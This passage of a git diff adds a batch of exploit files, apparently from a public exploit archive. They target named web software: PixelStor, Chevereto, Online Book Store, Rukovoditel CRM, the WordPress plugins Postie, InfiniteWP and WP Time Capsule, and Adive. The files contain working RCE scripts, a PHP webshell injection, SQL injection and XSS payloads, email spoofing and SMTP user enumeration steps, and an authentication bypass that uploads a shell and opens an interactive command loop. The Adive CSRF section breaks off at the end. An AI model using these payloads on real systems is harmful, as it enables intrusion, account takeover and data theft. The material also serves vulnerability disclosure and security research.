+	headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+	data = {"lang": ";" + cmd + ";/bin/echo -n en"}
+	r = requests.post(url, headers=headers, data=data)
+	if(r.status_code == 200):
+		print("\nPwned :]")
+	else:
+		print("\nNot vulnerable :(")
+
+print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")
+
+if len(sys.argv) !=2:
+    print("\n[+] Usage: python " + sys.argv[0] + " <url>\n")
+    sys.exit(1)
+
+if __name__ == "__main__":
+	url = sys.argv[1]
+	cmd = raw_input("\n[Linux Command]:")
+	poc(url, cmd)
+#EoF
\ No newline at end of file
diff --git a/exploits/php/webapps/47903.py b/exploits/php/webapps/47903.py
new file mode 100755
index 000000000..eb4fb399f
--- /dev/null
+++ b/exploits/php/webapps/47903.py
@@ -0,0 +1,60 @@
+# Exploit Title:  Chevereto 3.13.4 Core - Remote Code Execution  
+# Date: 2020-01-11
+# Exploit Author: Jinny Ramsmark 
+# Vendor Homepage:  https://chevereto.com/
+# Software Link: https://github.com/Chevereto/Chevereto-Free/releases
+# Version:  1.0.0 Free - 1.1.4 Free, <= 3.13.4 Core
+# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
+# CVE : N/A
+
+from urllib import request, parse
+from time import sleep
+
+#Python3
+#Needs to have a valid database server, database and user to exploit
+#1.0.0 Free version confirmed vulnerable
+#1.1.4 Free version confirmed vulnerable
+#3.13.4 Core version confirmed vulnerable
+
+def main():
+
+    target = 'http://cheveretoinstallation/'
+    cookie = 'PHPSESSID=89efba681a8bb81d32cd10d3170baf6e'
+    db_host = 'ip_to_valid_mysql'
+    db_name = 'valid_db'
+    db_user = 'valid_user'
+    db_pass = 'valid_pass'
+    db_table_prefix = 'chv_'
+
+    inject = "';if(strpos(file_get_contents('images/license.php'), '$_POST[\"ccc\"]') === false){file_put_contents('images/license.php','if(isset($_POST[\"ccc\"])){;system($_POST[\"ccc\"]);}');}//"
+
+    #Clean data for when we want to clean up the settings file
+    params = {'db_host': db_host, 'db_name': db_name, 'db_user': db_user, 'db_pass': db_pass, 'db_table_prefix': db_table_prefix}
+    data = parse.urlencode(params).encode()
+
+    #Settings data with injected code
+    params['db_table_prefix'] += inject
+    dataInject = parse.urlencode(params).encode()
+
+    #Do inject
+    doPostRequest(target + 'install', dataInject, cookie)
+    sleep(1)
+
+    #Request index page to run the injected code
+    doRequest(target)
+
+    sleep(1)
+    #Do a clean request to clean up the settings.php file
+    doPostRequest(target + 'install', data, cookie)
+
+def doPostRequest(target, data, cookie):
+    req = request.Request(target, data=data)
+    req.add_header('Cookie', cookie)
+    resp = request.urlopen(req)
+
+def doRequest(target):
+    req = request.Request(target)
+    resp = request.urlopen(req)
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/47914.txt b/exploits/php/webapps/47914.txt
new file mode 100644
index 000000000..51ff68c7b
--- /dev/null
+++ b/exploits/php/webapps/47914.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
+# Date: 2019-11-10
+# Exploit Author: Raspina Net Pars Group
+# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
+# Version: 1.93.21.19
+# CVE : CVE-2019-18859
+
+# PoC
+
+GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+# Author Website: HTTPS://RNPG.info
\ No newline at end of file
diff --git a/exploits/php/webapps/47922.txt b/exploits/php/webapps/47922.txt
new file mode 100644
index 000000000..3faaddf07
--- /dev/null
+++ b/exploits/php/webapps/47922.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Online Book Store 1.0 -  'bookisbn' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-15
+# Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.)
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+-------------- Vulnerable code in book.php ( Line 1-25) -----------------------------------------------
+  $book_isbn = $_GET['bookisbn']; // vulnerable param 
+  // connecto database
+  require_once "./functions/database_functions.php";
+  $conn = db_connect();
+
+  $query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'"; // Injectable Point
+  $result = mysqli_query($conn, $query);
+  if(!$result){
+    echo "Can't retrieve data " . mysqli_error($conn);
+    exit;
+  }
+
+  $row = mysqli_fetch_assoc($result);
+  if(!$row){
+    echo "Empty book";
+    exit;
+  }
+
+  $title = $row['book_title'];
+  require "./template/header.php";
+?>
+      <!-- Example row of columns -->
+      <p class="lead" style="margin: 25px 0"><a href="books.php">Books</a> > <?php echo $row['book_title']; ?></p> // results goes here
+-------------------------------------------------------------------------------------------------------------------
+
+Exploit POC :
+
+# Parameter: bookisbn (GET)
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
+
+#Payload: 
+http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp
+
+-----------------------
+Other Vulnerable Pages with Same vulnerability  :
+
+[PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16]
+
+[PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31]
+
+[PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php]
+
+and other pages .... :)
+
+Also you can have more fun with Other XSS bugs too :)
+----
\ No newline at end of file
diff --git a/exploits/php/webapps/47925.txt b/exploits/php/webapps/47925.txt
new file mode 100644
index 000000000..47044e2b1
--- /dev/null
+++ b/exploits/php/webapps/47925.txt
@@ -0,0 +1,85 @@
+# Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
+# Google Dork: inurl:/wp-content/plugins/postie/readme.txt
+# Date: 2020-01-15
+# Exploit Author: V1n1v131r4
+# Vendor Homepage: https://postieplugin.com/
+# Software Link: https://wordpress.org/plugins/postie/#developers
+# Version: <=1.9.40
+# Tested on: Linux
+# CVE : CVE-2019-20203, CVE-2019-20204
+
+## Identifying WordPress Postie Plugin installation
+
+#!/bin/bash                                                                                                                                                                                                                                     if curl -s -o /dev/null -w "%{http_code}" http://<domain.com>/wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then                                                                                                                    echo ""                                                                                                                 echo "Postie installed!"                                                                                        else                                                                                                                            echo ""                                                                                                                 echo "Postie seems not to be installed"                                                                         fi  
+
+## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204)
+
+# the syntax below should go as email body
+
+jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(You've been hacked)//'>
+
+## Email to post on Postie
+
+- Identifying the mail server
+
+	dig domain.com mx
+
+- enumerating accounts via SMTP
+
+	telnet domain.com 587
+	EHLO buddy
+	mail from:<sender@example.io>
+	rcpt to:<user@domain.com>
+	vrfy user@domain.com
+
+
+- listing accounts via third party software
+
+	You can use these third party software and APIs to enumerate target email users:
+	- https://www.zerobounce.net
+	- https://tools.verifyemailaddress.io/
+	- https://hunter.io/email-verifier
+
+
+
+## Spoofing with PHPMailer
+
+
+<?php
+
+	/* CONFIGURE PHP IF NEEDED */
+	// ini_set("sendmail_from","$fromFull");
+	// ini_set("SMTP","mail.domain.com");
+	// ini_set('smtp_port',587);
+	// ini_set('username',"user");
+	// ini_set('password',"pass");
+
+
+	// COMPOSE
+	$to      = 'postie@domain.com';
+	$subject = 'Title of your post';
+	$message = 'You've been hacked :-)';
+	
+
+	// BASIC HEADER
+	$headers = 'From: wordpress.admin@domain.com' . "\r\n" .
+	   	   	   'Reply-To: wordpress.admin@domain.com' . "\r\n" .
+	    	   'X-Mailer: PHP/' . phpversion();
+	
+	
+	// SEND AND SHOW MESSAGE
+	if (mail($to, $subject, $message, $headers)) echo $headers.'<h1>Mail sent!</h1>';
+	else echo '<h1>Something went wrong...</h1>';
+	
+
+	// FULL HEADER
+	// $headers  = "From: testsite < mail@testsite.com >\n";
+	// $headers .= "Cc: testsite < mail@testsite.com >\n"; 
+	// $headers .= "X-Sender: testsite < mail@testsite.com >\n";
+	// $headers .= 'X-Mailer: PHP/' . phpversion();
+	// $headers .= "X-Priority: 1\n";
+	// $headers .= "Return-Path: mail@testsite.com\n";
+	// $headers .= "MIME-Version: 1.0\r\n";
+	// $headers .= "Content-Type: text/html; charset=iso-8859-1\n";
+
+    ?>
\ No newline at end of file
diff --git a/exploits/php/webapps/47926.txt b/exploits/php/webapps/47926.txt
new file mode 100644
index 000000000..b953dbaf5
--- /dev/null
+++ b/exploits/php/webapps/47926.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-15
+# Blog: https://fatihhcelik.blogspot.com/
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://sourceforge.net/projects/rukovoditel/
+# Version: 2.5.2
+# Tested on: Kali Linux
+# CVE : N/A
+
+# Request,
+
+POST /ruko/index.php?module=items/listing HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/ruko/index.php?module=reports/view&reports_id=68%27
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 330
+Connection: close
+Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
+
+redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
+
+# PAYLOADS,
+
+# Parameter: reports_id (POST)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+
+Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' RLIKE (SELECT (CASE WHEN (9654=9654) THEN 68 ELSE 0x28 END))-- AlKt&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 8112 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(8112=8112,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rVyr&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 4324 FROM (SELECT(SLEEP(5)))KySi)-- Pfwf&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
\ No newline at end of file
diff --git a/exploits/php/webapps/47928.txt b/exploits/php/webapps/47928.txt
new file mode 100644
index 000000000..1677bb8d2
--- /dev/null
+++ b/exploits/php/webapps/47928.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload 
+# Google Dork: N/A
+# Date: 2020-01-16
+# Exploit Author: Or4nG.M4n aka S4udiExploit 
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: MY MIND v1.23.45
+# CVE: N/A
+# WWW . SEC4EVER . COM
+ -> hola amigos ^.^
+ -> just copy this html code 
+ <form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">
+				<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
+				<td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>
+				<td><input type="file" name="image"></td>
+		    <input type="submit" name="save_change" value="Change" class="btn btn-primary">		
+	</form>
+ -> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php
+# i think am back %^_^% 
+# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
+# big thanks to Stupid Coder ^.^
\ No newline at end of file
diff --git a/exploits/php/webapps/47931.txt b/exploits/php/webapps/47931.txt
new file mode 100644
index 000000000..e76004576
--- /dev/null
+++ b/exploits/php/webapps/47931.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-15
+# Blog: https://fatihhcelik.blogspot.com/
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://sourceforge.net/projects/rukovoditel/
+# Version: 2.5.2
+# Tested on: Kali Linux
+# CVE : N/A
+
+ 
+
+# Request,
+GET /ruko/index.php?module=entities/fields&entities_id=25 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/ruko/index.php?module=entities/fields&entities_id=25
+Connection: close
+Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+# PAYLOADS,
+
+# Parameter: entities_id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+
+Payload: module=entities/fields&entities_id=25' AND 2091=2091 AND 'emRY'='emRY
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: module=entities/fields&entities_id=25' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(2023=2023,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZZpM'='ZZpM
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: module=entities/fields&entities_id=25' AND (SELECT 5681 FROM (SELECT(SLEEP(5)))rdOz) AND 'vWza'='vWza
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 23 columns
+
+Payload: module=entities/fields&entities_id=25' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706a71,0x5a664143527068525459496254624c514e45694d42776a6d67614a68434c6762434f62514d4f4566,0x7162787871),NULL-- syQw
\ No newline at end of file
diff --git a/exploits/php/webapps/47934.txt b/exploits/php/webapps/47934.txt
new file mode 100644
index 000000000..56af517fa
--- /dev/null
+++ b/exploits/php/webapps/47934.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-15
+# Blog: https://fatihhcelik.blogspot.com/
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://sourceforge.net/projects/rukovoditel/
+# Version: 2.5.2
+# Tested on: Kali Linux
+# CVE : N/A
+
+# Request,
+
+POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 125
+Connection: close
+Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
+
+page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D=
+
+ 
+# PAYLOADS,
+
+# Parameter: filters[1][value] (POST)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm
+
+# Parameter: filters[0][value] (POST)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+
+Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1
\ No newline at end of file
diff --git a/exploits/php/webapps/47939.py b/exploits/php/webapps/47939.py
new file mode 100755
index 000000000..df65edb33
--- /dev/null
+++ b/exploits/php/webapps/47939.py
@@ -0,0 +1,39 @@
+# Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
+# Date: 2020-1-16
+# Exploit Author: Raphael Karger
+# Vendor Homepage: https://infinitewp.com/
+# Version: InfiniteWP Client < 1.9.4.5
+
+#!/usr/bin/python3
+
+import requests
+import json
+import argparse
+import base64
+import json
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def exploit(site, username):
+    json_info = {"iwp_action":"add_site","params":{"username": username}}
+    try:
+        return requests.post(site, timeout=5, verify=False,
+            headers={"User-Agent" : "raphaelrocks"},
+            data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8"))
+        )
+    except Exception as e:
+        print("[-] HTTP Exploit Error: {}".format(e))
+    return False
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
+    parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
+    args = parser.parse_args()
+    site_exploit = exploit(args.url, args.username)
+    if site_exploit and site_exploit.status_code == requests.codes.ok:
+        cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()])
+        if cookie_string:
+            print("[+] Use Cookies to Login: \n{}".format(cookie_string))
+            exit(0)
+    print("[-] Exploit Failed")
\ No newline at end of file
diff --git a/exploits/php/webapps/47941.py b/exploits/php/webapps/47941.py
new file mode 100755
index 000000000..019fb19cf
--- /dev/null
+++ b/exploits/php/webapps/47941.py
@@ -0,0 +1,58 @@
+# Exploit Title: Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass
+# Date: 2020-01-16
+# Exploit Author: B. Canavate 
+# Vendor Homepage: https://wptimecapsule.com/
+# Software Link: https://wptimecapsule.com/
+# Version:  Wordpress Time Capsule Plugin < 1.21.16
+# Tested on: LAMP stack with most recent Wordpress
+
+
+
+---- code below ----
+
+
+# PoC by: B. Canavate 
+# Based on the research done by the fine people at: https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
+# GitHub repo with breakdown: https://github.com/SECFORCE/WPTimeCapsulePOC
+
+
+import requests
+import sys
+
+
+if len(sys.argv) == 1:
+	print "Usage:  poc.py http://127.0.0.1/ - Get Admin cookie"
+	print " poc.py http://127.0.0.1/ shell - Get Admin Cookie + Upload a shell on /wp-content/plugins/shell/shell.php "
+	print " Shell usage: /shell.php?pass=mak3ithapp3n&cmd=COMMAND"
+else:
+	url = sys.argv[1]
+	session = requests.Session()
+	rawBody = "IWP_JSON_PREFIX"
+	headers = {"Referer":url}
+	response = session.post(url, data=rawBody, headers=headers, verify=False)
+	for cookie in response.cookies:
+		if "logged" in cookie.name:
+			cookieadmin = cookie
+	response2 = session.get(url+"wp-admin/index.php", headers=headers, cookies = response.cookies, verify=False)
+	if "Dashboard" in response2.content:
+		print "This is the cookie that  you are looking for :-)"
+		print cookieadmin.name+":"+cookieadmin.value
+
+		if len(sys.argv) == 3 and sys.argv[2] == "shell":
+			response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd=",verify=False)
+			if response.status_code != 200 :
+				paramsGet = {"action":"upload-plugin"}
+				paramsPost = {"_wpnonce":"1ef2140910","_wp_http_referer":"/wp-admin/plugin-install.php","install-plugin-submit":"Install Now"}
+				paramsMultipart = [('pluginzip', ('shell.zip', "PK\x03\x04\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x00\x00shell.php\x85\x8d1O\xc30\x10\x85\xe7\xfaW\x9c\xaa\xaaM:4\xa0n\x86P\xa1\x10\x24\x18\xa0\x24\x94\x05!d\xdc\x0b\xb6\x88c+\xe7\x0c\x15\xea\x7f\xc7\xc9\x80\xaav\xe8-\xa7\xbb\xf7\xbd\xf7\xaeWN9\x06a\x92\xf9\xb0\xd6u\xf7\xad\x1bx\x12\x069\x94yv\xff\\d9\xacm\x06\xa5\xc2\xba>d6\xc5\x03\x07\xe5\xbd\x23\x9e\x24\x84\xb2\xb2\xad\xc4\x85\xb4f\x80\xee\x90d\xab\x9d\xd7\xb6\xe1\xf0\xd8\x91\x07\x01(h\x07\xf4\x9fs\xdbye[\x0e_\xc1\xa8\x86\xcf\x1b\xb64\x18.\x16\x97\x07\xc8\x99\xaay\xc2\x180\xd0U\xa4\x89\xd0G\x93\xcf\"\x7f\xd9\xe4\xe5\xeb\xfbL\x9a\xed\xec\x23\x86\xe9\x14N\x24'\x88\x82\x16\xff\xb2\x91\xae\xe0T\x814\x85\xb1\x11?K\xed\x95pn\xd9\x8c{t4\x09\x91\x90\xc2q\xc7U\x90hG\x1eM\xd4\x13q\x7fo5\x86\xb5g{\xb6\xbaa\x7fPK\x01\x02?\x03\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x24\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\x00\x00\x00\x00shell.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00\x09\x01\x00\x00\x00\x00", 'application/zip'))]
+				headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0","Referer":url+"/wp-admin/plugin-install.php","Connection":"close","Accept-Encoding":"gzip, deflate","DNT":"1","Accept-Language":"en-GB,en;q=0.5"}
+				cookies = {"wordpress_test_cookie":"WP+Cookie+check","wordpress_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CVEj3PYaEDRwiYHj9dvd3H2813BfDsqNxAJQyF0N4nOa%7Ccd8ab0bf244d404dc2b3ec55335545553a8017c254357f76b061345dfa751545","wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CfoMJPKzwmHvHzKkdwvUcxUIXU327HQWR6Lrv1oP6qzA%7C2531f7ca8075fd9e0a56293dd7a627b2de1ddfe49ff34be9f0835e2a5e4cccb4","wp-settings-time-1":"1579176444"}
+				response = session.post(url+"/wp-admin/update.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)
+			print ("Now you have a shell! ")
+			command = ""
+			while(1 and (command != "exit")):
+				command = str(raw_input())
+				response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd="+command, verify=False)
+				print(response.content)
+			print "Remember to delete the shell.php :-)"
+	else:
+		print "There was an error :("
\ No newline at end of file
diff --git a/exploits/php/webapps/47946.txt b/exploits/php/webapps/47946.txt
new file mode 100644
index 000000000..398a24b1e
--- /dev/null
+++ b/exploits/php/webapps/47946.txt
@@ -0,0 +1,88 @@
+# Exploit Title:  Adive Framework 2.0.8 - Persistent Cross-Site Scripting
+# Exploit Author: Sarthak Saini
+# Dork: N/A
+# Date: 2020-01-18
+# Vendor Link : https://www.adive.es/
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.8
+# Category: Webapps
+# Tested on: windows64bit / mozila firefox 
+
+1) Persistent Cross-site Scripting at user add page 
+
+Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
+ 
+Payload:- <script>alert(1)</script>
+
+POST /admin/user/add HTTP/1.1
+Host: 192.168.2.5
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 62
+Origin: http://192.168.2.5
+DNT: 1
+Connection: close
+Referer: http://192.168.2.5/admin/user/add
+Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
+Upgrade-Insecure-Requests: 1
+
+userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3
+
+
+|----------------------------------------------------------------------------------
+
+
+2) account takeover - cross side request forgery 
+
+
+Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.
+
+-> Save the payload as exp.js
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
+function execute()
+{
+  var nuri ="http://192.168.2.5/admin/config";
